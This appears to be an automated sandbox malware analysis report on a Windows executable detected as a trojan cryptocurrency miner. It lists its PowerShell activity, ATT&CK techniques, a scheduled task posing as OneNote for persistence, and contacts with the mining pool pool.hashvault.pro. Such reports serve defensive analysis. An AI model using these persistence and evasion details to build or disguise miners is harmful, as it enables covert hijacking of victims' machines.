    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3806D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A3806D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A364E70 GetVersionExW,0_2_00007FF65A364E70
    MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the signature count shown in the matrix cell):

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: 11 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: 1 Exploitation for Privilege Escalation; 11 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: 1 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; Compile After Delivery
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: 1 System Time Discovery; 31 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 34 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
    Behavior Graph (ID: 1428499, sample: file.exe, start date: 19/04/2024, architecture: WINDOWS, score: 84). Contacted domain: pool.hashvault.pro. Graph-level signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner.

    Process tree recovered from the graph (signatures attached to a node in parentheses):

    file.exe
      cmd.exe (Very long command line found)
        conhost.exe
        cmd.exe (Very long command line found)
          conhost.exe
          cmd.exe
          powershell.exe (Suspicious powershell command line found; dropped C:\Users\user\AppData\...\Network64476Man.cmd, DOS)
            cmd.exe
              conhost.exe
              cmd.exe (Very long command line found)
                conhost.exe
                cmd.exe
                powershell.exe (Suspicious powershell command line found)
                  powershell.exe (Loading BitLocker PowerShell Module)
                    conhost.exe
                  powershell.exe
                    conhost.exe
                  powershell.exe
            powershell.exe (Loading BitLocker PowerShell Module)
              conhost.exe
            powershell.exe
              conhost.exe
            powershell.exe
    cmd.exe
      conhost.exe

    Source | Detection | Scanner | Label | Link
    file.exe | 21% | ReversingLabs | Win64.Trojan.Pantera |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
    http://crl.microsoft | 0% | URL Reputation | safe |
    https://go.micro | 0% | URL Reputation | safe |
    https://contoso.com/ | 0% | URL Reputation | safe |
    https://contoso.com/License | 0% | URL Reputation | safe |
    https://contoso.com/Icon | 0% | URL Reputation | safe |
    https://oneget.orgX | 0% | URL Reputation | safe |
    http://www.microsoft. | 0% | URL Reputation | safe |
    https://oneget.org | 0% | URL Reputation | safe |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    pool.hashvault.pro | 142.202.242.43 | true | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217803E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crl.microsoft | powershell.exe, 00000017.00000002.2153655366.000001DF16876000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.microsoft.co0 | powershell.exe, 00000008.00000002.1940934137.00000240B2EEF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://go.micro | powershell.exe, 00000007.00000002.1745848773.0000021780F42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.0000021520B53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF176D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB94D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D01587000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.microsoft.coQ | powershell.exe, 00000018.00000002.2558198678.000001EBD2EE3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://contoso.com/ | powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.1760886154.0000021790092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.0000021781C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217802E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/License | powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/Icon | powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://oneget.orgX | powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000018.00000002.2316867721.000001EBBB5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB5AC000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.microsoft. | powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1938585602.00000240B2E15000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16EAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://aka..winsvr | powershell.exe, 0000001B.00000002.2623470775.0000013D002DC000.00000004.00000020.00020000.00000000.sdmp | false | | low
    https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://oneget.org | powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://crl.microsoftr | powershell.exe, 00000008.00000002.1839958983.0000024098D98000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                    No contacted IP infos
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1428499
                                    Start date and time:2024-04-19 03:18:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 44s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal84.evad.mine.winEXE@40/31@1/0
                                    EGA Information:
                                    • Successful, ratio: 40%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 96
                                    • Number of non-executed functions: 94
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 1228 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 4428 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7888 because it is empty
    • Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
    Time | Type | Description
    02:19:30 | Task Scheduler | Run new task: OneNote 64476 path: C:\Users\user\AppData\Roaming\Network64476Man.cmd
    03:19:03 | API Interceptor | 156x Sleep call for process: powershell.exe modified
                                    No context
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    pool.hashvault.pro | SecuriteInfo.com.Trojan.PWS.Siggen3.25256.942.20710.exe | malicious | Exela Stealer, Xmrig | 142.202.242.43
    pool.hashvault.pro | SecuriteInfo.com.Trojan.Siggen27.52043.15111.6134.exe | malicious | Xmrig | 142.202.242.43
    pool.hashvault.pro | VTbtz4ZUY6.exe | malicious | Xmrig | 142.202.242.45
    pool.hashvault.pro | AQrfgZUJcl.exe | malicious | Xmrig | 142.202.242.43
    pool.hashvault.pro | SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe | malicious | Xmrig | 142.202.242.43
    pool.hashvault.pro | gQZvXi6Osc.exe | malicious | PureLog Stealer, Xmrig, zgRAT | 142.202.242.43
    pool.hashvault.pro | zLAr8hkDsu.exe | malicious | PureLog Stealer, Xmrig, zgRAT | 142.202.242.43
    pool.hashvault.pro | udgE7Q3gs6.exe | malicious | PureLog Stealer, Xmrig, zgRAT | 142.202.242.43
    pool.hashvault.pro | services64.exe | malicious | Xmrig | 142.202.242.43
